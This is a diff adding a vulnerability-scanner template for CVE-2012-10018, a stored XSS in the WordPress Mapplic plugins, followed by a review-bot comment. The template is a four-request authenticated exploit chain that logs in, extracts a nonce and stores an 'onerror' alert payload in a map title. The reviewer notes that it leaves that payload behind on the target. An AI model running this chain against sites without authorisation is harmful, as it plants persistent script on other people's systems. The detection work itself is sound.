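--- a/http/cves/2012/CVE-2012-10018.yaml
+++ b/http/cves/2012/CVE-2012-10018.yaml
@@ -0,0 +1,107 @@
+id: CVE-2012-10018
+
+info:
+name: WordPress Mapplic <= 6.1 / Mapplic Lite <= 1.0 - Authenticated Stored XSS via SVG File Upload
+author: KrE80r
+severity: high
+description: |
+The Mapplic and Mapplic Lite plugins for WordPress are vulnerable to Stored Cross-Site Scripting via arbitrary URL injection in versions up to and including 6.1 and 1.0 respectively. Authenticated users with author-level permissions can inject arbitrary remote URLs for SVG map files. When a user views the map (admin panel or frontend page with shortcode), the browser fetches the SVG via jQuery .load() and inserts it into the DOM. If the SVG contains embedded JavaScript, it executes as XSS.
+impact: |
+An attacker with author-level access can inject URLs pointing to malicious SVG files containing JavaScript payloads. When any user views the map, the browser loads the SVG and executes the embedded scripts, potentially leading to session hijacking, privilege escalation, or complete site compromise.
+remediation: |
+Update Mapplic to version 7.0 or later, and Mapplic Lite to version 1.0.1 or later.
+reference:
+- https://nvd.nist.gov/vuln/detail/CVE-2012-10018
+- https://wpscan.com/vulnerability/7bdee32b-9036-4e13-9586-4d6a9a1159c6/
+- https://patchstack.com/database/wordpress/plugin/mapplic-lite/vulnerability/wordpress-mapplic-lite-plugin-1-0-stored-cross-site-scripting-xss-injection-via-server-side-request-forgery-ssrf-vulnerability
+- https://packetstormsecurity.com/files/161920/WordPress-Mapplic-6.1-SSRF-Cross-Site-Scripting.html
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
+cvss-score: 8.3
+cve-id: CVE-2012-10018
+cwe-id: CWE-79
+epss-score: 0.00045
+epss-percentile: 0.17483
+cpe: cpe:2.3:a:mapplic:mapplic:*:*:*:*:*:wordpress:*:*
+metadata:
+verified: true
+max-request: 4
+vendor: mapplic
+product: mapplic
+tags: cve,cve2012,wordpress,wp-plugin,xss,mapplic,kev,vkev,authenticated
+
+flow: http(1) && http(2) && http(3) && http(4)
+
+http:
+- raw:
+- |
+POST /wp-login.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+matchers:
+- type: dsl
+dsl:
+- status_code == 302
+- contains(header, "wordpress_logged_in")
+condition: and
+internal: true
+
+- raw:
+- |
+GET /wp-admin/post-new.php?post_type=mapplic_map HTTP/1.1
+Host: {{Hostname}}
+
+matchers:
+- type: dsl
+dsl:
+- status_code == 200
+- contains_all(body, "name=\"_wpnonce\"","post_ID")
+condition: and
+internal: true
+
+extractors:
+- type: regex
+name: nonce
+part: body
+group: 1
+regex:
+- 'name="_wpnonce" value="([a-f0-9]+)"'
+internal: true
+
+- type: regex
+name: post_id
+part: body
+group: 1
+regex:
+- 'name=.post_ID. value=.(\d+).'
+internal: true
+
+- raw:
+- |
+POST /wp-admin/post.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+
+_wpnonce={{nonce}}&post_ID={{post_id}}&post_title=Test&mapplic-mapdata=%7B%22mapwidth%22%3A%22100%22%2C%22mapheight%22%3A%22100%22%2C%22levels%22%3A%5B%7B%22id%22%3A%22test%22%2C%22title%22%3A%22%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E%22%2C%22map%22%3A%22test.svg%22%7D%5D%7D&action=editpost&post_type=mapplic_map
+
+matchers:
+- type: dsl
+dsl:
+- status_code == 302
+internal: true
+
+- raw:
+- |
+GET /wp-admin/post.php?post={{post_id}}&action=edit HTTP/1.1
+Host: {{Hostname}}
+
+matchers:
+- type: dsl
+dsl:
+- status_code == 200
+- contains_all(body, "<img src=x onerror=alert(document.domain)>", "mapplic-mapdata")
+condition: and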
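Review bot: The third request persists a live `<img onerror>` payload in a new `mapplic_map` post and nothing in the template removes it, so every scan leaves a stored-XSS artifact in the target's database that fires for any editor who later opens that post. Either append a cleanup request that trashes `{{post_id}}` (WordPress requires its own nonce for that action, so it would need a further extractor from the edit page) or at least add `intrusive` to `tags` and state in `description` that the template creates a post it does not clean up. Separately, `name` and `description` describe injection of a remote SVG URL, but the request only exercises the level `title` field with `map` fixed to `test.svg`, so the final matcher demonstrates unescaped reflection of `title` in the edit page rather than the SVG-URL vector; the description should say what is actually verified. The `max-request: 4` value would also need updating if a cleanup request is added.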